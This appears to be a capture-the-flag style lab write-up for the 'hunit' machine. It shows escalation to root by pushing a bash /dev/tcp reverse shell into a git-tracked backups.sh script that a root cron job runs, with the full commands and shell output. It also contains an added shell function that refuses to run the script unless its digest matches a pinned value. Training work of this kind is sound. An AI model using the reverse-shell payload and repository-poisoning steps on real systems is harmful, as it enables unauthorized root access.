Git Push / Cronjob
The root account’s cronjob is configured to execute the /root/git-server/backups.sh script and pull updates from the /git-server repository every two minutes.
The /git-server repository contains the backups.sh file. Any modifications made to the backups.sh file and pushed to the main branch of the repository will be automatically fetched by the scheduled pull process. As a result, the root cronjob will execute the updated backups.sh script with root privileges, potentially allowing unauthorized code execution with elevated permissions.
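One way to close this path, shown as an added example that is not part of the original write-up: the root cron job executes backups.sh only when its SHA-256 matches a digest that root pinned outside the repository. The function names and the pin file are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): a gate a root cron job can
# call before executing a script that lives in a git working tree.
# Hypothetical names: verify_pinned_script, run_if_pinned, and the pin file.

# verify_pinned_script SCRIPT PINFILE
# Returns 0 only when SCRIPT is a regular, non-symlink file that is not
# group/other-writable and whose SHA-256 equals the digest stored in PINFILE.
# PINFILE is assumed to be root-owned and kept OUTSIDE the repository.
verify_pinned_script() {
    vps_script=$1
    vps_pin=$2
    if [ -L "$vps_script" ] || [ ! -f "$vps_script" ]; then
        echo "reject: $vps_script is not a regular file" >&2
        return 2
    fi
    if [ ! -r "$vps_pin" ]; then
        echo "reject: pin file $vps_pin is missing or unreadable" >&2
        return 2
    fi
    # ls -ld prints e.g. -rwxr-xr-x; char 6 is group-write, char 9 other-write.
    vps_perms=$(ls -ld -- "$vps_script") || return 2
    case $vps_perms in
        ?????w*|????????w*)
            echo "reject: $vps_script is group/other-writable" >&2
            return 3 ;;
    esac
    vps_expected=$(awk 'NR==1 {print $1}' "$vps_pin")
    vps_actual=$(sha256sum -- "$vps_script" | awk '{print $1}')
    if [ -z "$vps_expected" ] || [ "$vps_expected" != "$vps_actual" ]; then
        echo "reject: digest mismatch for $vps_script" >&2
        return 4
    fi
    return 0
}

# run_if_pinned SCRIPT PINFILE: execute SCRIPT only after it passes the gate.
# Runs the script under sh; substitute the interpreter the script requires.
run_if_pinned() {
    verify_pinned_script "$1" "$2" || return $?
    sh -- "$1"
}
```

With this gate in place, a push that changes backups.sh stops the job with a digest mismatch until root reviews the change and re-pins the digest.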
Modifying backups.sh
[dademola@hunit git-server]$ vi backups.sh
[dademola@hunit git-server]$ cat backups.sh
#!/bin/bash
#
#
# # Placeholder
bash -c "bash -i >& /dev/tcp/192.168.45.218/18030 0>&1"
#
[dademola@hunit git-server]$ chmod 755 ./backups.sh
Updated the backups.sh script with a reverse shell in it
Commit
[dademola@hunit git-server]$ git commit -a
Author identity unknown
*** Please tell me who you are.
Run
git config --global user.email "you@example.com"
git config --global user.name "Your Name"
to set your account's default identity.
Omit --global to set the identity only in this repository.
fatal: unable to auto-detect email address (got 'dademola@hunit.(none)')
Attempting to commit fails because the current user doesn’t have a git profile
Git Config
[dademola@hunit git-server]$ git config --global user.email "dademola@localhost"
[dademola@hunit git-server]$ git config --global user.name "dademola"
Configuration complete
[dademola@hunit git-server]$ git commit -a
[master d2d10c3] changed#
1 file changed, 3 insertions(+)
mode change 100644 => 100755 backups.sh
Commit made
Failed Push
[dademola@hunit git-server]$ git push
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 2 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 386 bytes | 386.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
error: remote unpack failed: unable to create temporary object directory
To file:///git-server
! [remote rejected] master -> master (unpacker error)
error: failed to push some refs to 'file:///git-server'
It would appear that it failed due to lack of privileges.
It might need to be done as the git account.
As git account
Lateral movement to the git account has already been made.
Git Clone
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit]
└─$ GIT_SSH_COMMAND='ssh -p43022 -i ./id_rsa.git' git clone git@$IP:/git-server
Cloning into 'git-server'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (12/12), done.
Resolving deltas: 100% (2/2), done.
Clone the git-server repository to Kali, using the GIT_SSH_COMMAND for authentication
Modifying backups.sh
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ echo 'bash -c "bash -i >& /dev/tcp/192.168.45.218/18030 0>&1"' >> ./backups.sh
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ chmod 755 ./backups.sh
Appending the reverse shell command to the backups.sh file within the cloned git-server repository
Git Config
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ git config --local user.email "git@localhost"
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ git config --local user.name "git"
Configuring the git profile
Commit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ git commit -a -m "pe"
[master c53e638] pe
1 file changed, 1 insertion(+)
Making the commit
Push into master
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ GIT_SSH_COMMAND='ssh -p43022 -i ../id_rsa.git' git push origin master
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 12 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 313 bytes | 313.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
To 192.168.185.125:/git-server
b50f4e5..c53e638 master -> master
Pushed the commit to master
Confirmation
[dademola@hunit git-server]$ git log
commit c53e6383406787a71f6052336e24323d93f225dc (HEAD -> master)
Author: git <git@localhost>
Date: Mon Mar 31 00:42:46 2025 +0200
pe
Back on the target system, I can check the change
Shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ nnc 18030
listening on [any] 18030 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.185.125] 49964
bash: cannot set terminal process group (17463): Inappropriate ioctl for device
bash: no job control in this shell
[root@hunit ~]# whoami
whoami
root
[root@hunit ~]# hostname
hostname
bash: hostname: command not found
[root@hunit ~]# cat /etc/hostname
cat /etc/hostname
hunit
[root@hunit ~]# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.185.125 netmask 255.255.255.0 broadcast 192.168.185.255
inet6 fe80::250:56ff:fe9e:c151 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:9e:c1:51 txqueuelen 1000 (Ethernet)
RX packets 24933 bytes 5842977 (5.5 MiB)
RX errors 0 dropped 168 overruns 0 frame 0
TX packets 8839 bytes 3681561 (3.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 26 bytes 1300 (1.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 26 bytes 1300 (1.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
A moment later, I get a root shell
System level compromise